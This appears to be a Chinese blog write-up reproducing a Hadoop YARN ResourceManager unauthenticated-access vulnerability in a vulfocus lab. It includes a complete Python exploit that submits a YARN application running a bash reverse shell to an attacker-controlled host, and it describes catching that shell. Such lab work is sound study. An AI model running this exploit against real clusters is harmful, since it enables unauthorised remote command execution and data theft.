1 先容
Hadoop YARN(Yet Another Resource Negotiator)的ResourceManager是集群资源管理的焦点组件,负责分配和管理集群资源以及调度作业。如果ResourceManager出现未授权访问漏洞,可能答应未经认证的用户访问或操作集群资源,这可能会导致数据走漏、资源滥用或拒绝服务攻击。在这个复现中就是在组件的ui界面上出现了未授权访问漏洞
2 涉及版本
hadoop **3.3.0**以下
vulfocus上的是2.8.1版本
3 复现
vulfocus打开靶机
这个地方有映射关系,8088是hadoop的"All Applications"页面,通常不是一个单独的组件,而是Hadoop生态系统中某些组件的用户界面(UI)的一部分,它可能用于展示和管理集群中的各种应用程序。
待会我们需要使用exp对这个页面/cluster/apps进行未授权漏洞的攻击
参考exp:https://www.cnblogs.com/cute-puli/p/14944637.html
- `#!/usr/bin/env python
-
- import requests
-
- target = 'http://123.58.224.8:31840/' 目标网址
- lhost = '用来反弹的ip' # put your local host ip here, and listen at port 9999
-
- url = target + 'ws/v1/cluster/apps/new-application'
- resp = requests.post(url)
- app_id = resp.json()['application-id']
- url = target + 'ws/v1/cluster/apps'
- data = {
- 'application-id': app_id,
- 'application-name': 'get-shell',
- 'am-container-spec': {
- 'commands': {
- 'command': '/bin/bash -i >& /dev/tcp/%s/反弹到的端口号 0>&1' % lhost,
- },
- },
- 'application-type': 'YARN',
- }
- requests.post(url, json=data)
解决:解决阿里云的端口添加安全组仍然无法扫描到-CSDN博客
要先监听到端口,这个端口绑定了服务才可以扫描和访问上
这样就可以了,已经反弹过来了
我们根据vulfocus的提示查察env情况变量,我这里是退回到根目录了
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。 |
